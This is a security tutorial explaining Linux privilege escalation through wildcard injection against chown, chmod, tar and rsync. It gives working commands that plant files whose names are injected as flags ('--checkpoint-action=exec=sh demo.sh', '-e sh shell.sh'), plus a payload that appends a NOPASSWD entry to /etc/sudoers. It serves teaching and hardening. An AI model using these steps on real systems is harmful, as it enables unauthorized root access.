Linux privilege escalation using Wildcard Injection


Wildcards are symbols which represent other characters. You can use them with any command such as the cat or rm commands to list or remove files matching a given criteria. There are others, but the one that is important to us right now is the * character, which matches any number of characters.

For example:

  • cat * displays the contents of all files in the current directory
  • rm * removes all files in the current directory

How it works under the hood is that the * character gets expanded to all the matching files. If we have the files a, b and c in our current directory, and we run rm *, then the outcome will be rm a b c.

The problem

As we all know, we can give a program flags to indicate how it should run. For example, if we were to use rm -rf instead of rm, then it would forcefully and recursively delete files.

Now, what would happen if we had a file in our current directory, and its filename was -rf? In that case, running the command rm * would expand to rm a b c -rf, and the -rf would get parsed as a flag.

This is bad news when a privileged user or script uses wildcards in a command which has potentially dangerous flags. If that is the case, then we could use it to escalate our privileges.

Dangerous programs: chown and chmod

Both chown and chmod can be exploited in the same way, so I will only explain chown.

Chown is a program which allows you to change the owner of a specified file. The following example changes the owner of some-file.txt to be some-user:

chown some-user some-file.txt

Chown has a --reference=some-reference-file flag, which specifies that the owner of the file should be the same as the owner of the reference file. An example should help:

chown some-user some-file.txt --reference=some-reference-file

Let’s say the owner of some-reference-file is another-user. In that case, the owner of some-file.txt will be another-user instead of some-user.

Exploitation

Let’s say we have a vulnerable program called vulnerable.sh which contains the following:

cd some-directory
chown root *

In that case, let’s create a file which is owned by us:

cd some-directory 
touch reference

Then we create a file which will inject the flag:

echo "" > "--reference=reference"

If you create a symlink to /etc/passwd in the same directory, then the owner of /etc/passwd will also be you, which will allow you to gain a root shell. For more detailed information about escalating privileges using /etc/passwd, refer to this article.

Dangerous program: tar

Tar is a program which allows you to collect files into an archive.

In tar, there are “checkpoint” flags, which allow you to execute actions after a specified number of files have been archived. Since we can inject those flags with wildcard injection, we can use checkpoints to execute commands of our choosing. If tar is run as the root user, the commands will also be run as the root user.

Given this vulnerability, an easy way to gain root privileges is by making ourselves a sudoer. A sudoer is an user who can assume root privileges. These users are specified in the /etc/sudoers file. By just appending one extra line to that file, we can make ourselves a sudoer as well.

Exploitation

Let’s say we have a vulnerable program and cron is being used to run it periodically. The program contains the following:

cd important-directory
tar cf /var/backups/backup.tar *

The steps to follow for root access are:

1) Inject a flag which specifies our checkpoint

First we will specify that after one file has been archived, there is a checkpoint. We will later give an action to that checkpoint, but for now we will simply tell tar that it exists.

Let’s create the file which will inject the flag:

cd important-directory
echo "" > "--checkpoint=1"

2) Write a malicious shell script

The shell script will append code to /etc/sudoers that will make you a sudoer.

The line you need to add to/etc/sudoers is my-user ALL=(root) NOPASSWD: ALL.

Let’s create the shell script:

echo 'echo "my-user ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > demo.sh

Note that we will have to change my-user to be the actual user we want to make a sudoer.

3) Inject a flag which specifies the checkpoint action

We will now specify that, when tar hits the checkpoint we specified at step #1, it should run the shell script we created at step #2:

echo "" > "--checkpoint-action=exec=sh demo.sh"

4) Gain root

Wait until cron has executed the script and gain root privileges by typing:

sudo su

Dangerous program: rsync

Rsync is a “fast, versatile, remote (and local) file-copying tool”, that is very common on Unix systems.

Some interesting flags to use with rsync are:

 -e, --rsh=COMMAND           specify the remote shell to use
     --rsync-path=PROGRAM    specify the rsync to run on remote machine

We can use the -e flag to run any shell script we want. Let’s create a shell script which will add us to the sudoers file:

echo 'echo "my-user ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > shell.sh

Now let’s inject the flag which will run our shell script:

echo '' > '-e sh shell.sh'

Conclusion

Using wildcards seems completely safe at first glance, but in reality, we must take great care not to expose ourselves to wildcard injection.

Heino Sass Hallik